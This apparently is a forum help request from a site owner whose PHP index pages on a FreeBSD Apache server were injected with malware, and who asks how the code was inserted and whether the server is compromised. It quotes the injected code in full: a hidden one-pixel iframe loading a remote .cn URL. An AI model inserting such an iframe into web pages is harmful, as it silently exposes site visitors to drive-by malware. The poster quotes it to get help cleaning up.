iframe worm or malware infected my php pages
Recently some users told me that their antivirus software prompts them when they visit my web site telling them that some malware is present.
Now my site was reported as suspicious and Firefox and IE block access to it. Google also suspended my adwords account.
After some researches I've found that someone/something inserted the code:
<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">
on some index.php files (not all of them) and only from one web site (on the server there are many websites hosted).
On the server runs Apache/2.2.11 (FreeBSD).
I've removed the code but the problem could reappear so I must get to the source: how was the code inserted, by whom and if the server is compromised?
Does anyone know something about this? What should I do further?
rkhunter and chkrootkit say that everything is ok.